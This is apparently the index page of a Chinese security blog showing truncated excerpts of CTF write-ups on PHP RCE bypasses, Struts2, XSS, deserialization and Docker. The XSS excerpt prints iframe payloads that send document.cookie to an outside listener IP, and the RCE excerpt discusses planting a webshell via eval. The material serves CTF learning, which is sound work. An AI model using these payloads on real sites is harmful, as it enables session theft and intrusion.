晴川's Blog🌈

无参RCE0x00前言刷buu的时候遇到一道题，[GXYCTF2019]禁止套娃，涉及到无参数RCE，但是我不会，记录一下学习过程。 实例 12345if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']);}preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)pre_match('/et|na|nt|strlen|info|path||rand|dec|bin|hex|oct|pi|exp|log/i', $code)) 解析 1234preg_replace 的主要功能就是限制我们传输进来的必须是纯小写字母的函数，而且不能携带参数。再来看一下：(?R)?，这个意思为递归整个匹配模式。所以正则的含义就是匹配无参数的函数，内部可以无限嵌套相同的模式（无参数函数）preg_m ...

校赛wpCryptosolve_me先费马分解 flag{fa2371c5-bf58-4502-9fea-caf12a85d1ff} webEasycms 打开页面，页面显示taoCMS演示系统，想着应该有漏洞，上网搜taocms漏洞 看到文章http://blog.csdn.net/m0_46684679/article/details/129214411 访问url/admin/admin.php 弹出一个登录界面， 账户admin 密码tao 登录成功，跳转到这个界面 点击文件管理，进入../../../看到flag，点开看到flag QLNU{woW_CMs_1s_DAngeR0us_41rI9h7?_91b5e2b34cc2} Answered附脚本 1234567891011121314151617181920212223242526272829303132333435363738394041424344import requestsimport reimport timesession = requests.s ...

CTFshow-RCE极限大挑战前言ctfshow出的这五道rce感觉挺好玩的，但自己没做出几道来，所以来详细的复现一下，这几道题基本都是利用的自增，但长度逐渐缩短，雀氏极限。 RCE1源码1234567891011121314151617181920212223242526272829<?phperror_reporting(0);highlight_file(__FILE__);$code = $_POST['code'];$code = str_replace("(","括号",$code);$code = str_replace(".","点",$code);eval($code);?> 分析可以看到我们最后执行的是eval，而过滤的只有( 和. ，而php eval函数的作用是把字符串按照PHP代码来计算，比如果我们写入 echo 1 就会写入1 ，如果我们写入的是一句话木马，就可以成功植入木马，执行rce payload code=echo ``;&1= ...

Docker file 的基本操作1docker run hello-world 出现这种情况就说明正常， 对Docker操作安装完成Docker后,默认每次开机的时候都会自动启动,但我们也可以手动启动,关闭或者重启Docker 123456# 启动dockersudo service docker start# 重启dockersudo service docker restart# 停止dockersudo service docker stop 对镜像的基础操作获取当时所有镜像(docker images)123docker image ls# 或者docker images 标签 含义 REPOSITORY 镜像所在的仓库名称 TAG 镜像标签 IMAGEID 镜像ID CREATED 镜像的创建日期(不是获取该镜像的日期) SIZE 镜像大小 拉去镜像(docker pull)除了使用官方的镜像外,我们还可以在仓库中申请一个自己的账号,保存自己制作的进行,或者拉去使用他人的镜像。 官方镜像123456789101112131415doc ...

CTFshow-java系列web279-web300 前言java基础学了一段时间了也跟着白日梦组长学了一点java反序列化了，说实话，白日梦组长讲的确实好，一个类一个类带着你捋，领着你看看怎么是找到某个函数某个方法的，来做一下CTFshow的题，一方面看看java在ctf题中的应用，也来继续学习一下java。本篇文章跟着海神的文章学习的，我的神！ 此篇文章里全是Struts2框架漏洞Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架 判断网站是否基于Struts2的方法链接 通过页面回显的错误消息来判断，页面不回显错误消息时则无效 通过网页后缀来判断，如.do .action，有可能不准 如果配置文件中常数extension的值以逗号结尾或者有空值，指明了action可以不带后缀，那么不带后缀的uri也可能是struts2框架搭建的 如果使用Struts2的rest插件，其默认的struts-plugin.xml指定的请求后缀为xhtml,xml和json 判断 /struts/webconsole.html 是否存在来进行判断，需要 dev ...

ctfshow XSS跨站脚本注入漏洞 web316-web333做题过程要用到的平台https://xss.pt/，创建账号，好多playload，在项目管理了可看到flag web316用平台上pLAYload怎么是都是有no admin，很奇怪，看到网上用服务器监听，我也监听了，就是说，为啥还是 服啦 最后用自己服务器传入 location.href="http://ip:39543/"+document.cookie 服务器python3 -m http.server 39543可得到flag web317原理同上，被过滤,换成img web318换iframe标签 1<iframe onload=document.location='http://ip:39543/?cookie='+document.cookie> web3191<iframe onload=window.open('http://123.57.236.154:39543/?cookie='+document.cookie)> we ...

比赛打完了，虽然是个公益赛，也是拿到了名次，可是自己还是太菜了，只能做些简单题。。。 MISC签到]Welcome Pixel_art123456789101112131415161718192021222324252627282930313233from PIL import Image# 打开PNG图像文件image = Image.open('image.png')# 获取图像的宽度和高度width, height = image.size# 遍历每个像素for y in range(height): for x in range(width): # 获取像素的RGB值 r, g, b = image.getpixel((x, y)) # 判断RGB值并输出相应字符 if r == 46: print('.',end="") elif r == 33: print('!',end=& ...

2023蓝帽杯 初赛web题解之LovePHP比赛过去好久了，才想起来把这道题给复现一下，前些天忙着学车了，也没空，明天开学了，今天来复现一下。过了好久也没环境了，只能来本地试试了 源码看上去不难看懂，最主要有两个考点，file和反序列化的wakeup绕过 我们首先看一个小坑 由于php字符串解析的问题 PHP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事： 删除空白符 将某些字符（ [ 空格 + . ）转换为下划线 实际应用： get传参111_aa,不能直接传时，传111_aa。 //php的变量解析绕过，[ 被处理成 _ 当[提前出现后，后面的 . 就不会再被转义成_了。 当这些字符为首字母时，只有点号会被替换成下划 所以这个题传参要用my[sercet.flag 知道了这个我们再来看wakeup怎么过吧，这个题目的php版本是7.43版的，跟那个cve-2016-7124版本对不上，上网搜了一下高版本php怎么让wakeup，要用C绕过C:8:”Saferman”:0:{} 123456789101112131415161 ...

Java序列化和反序列化学习写在前面：谨记java反序列化学习，或许是简单的的吧 我是真懒啊，java学了好久了，感觉java学的好鸡肋。。。。。 重新再来学一遍了。。 ##前置知识： user类和**Serialize_test_1 **的关系 1234567891011121314151617import java.io.Serializable;public class User implements Serializable { //定义类的私有属性name private String name; //定义setName方法 public void setName(String name) { //当前类User的name等于setName传递进来的name this.name = name; } //定义getName方法，返回name值 public String getName() { return ...

小迪安全知识积累 php源码里面有乱码，开头是zend,去搜php解密https://www.toolnb.com/tools/phpcarbylamine.html .net文件反编译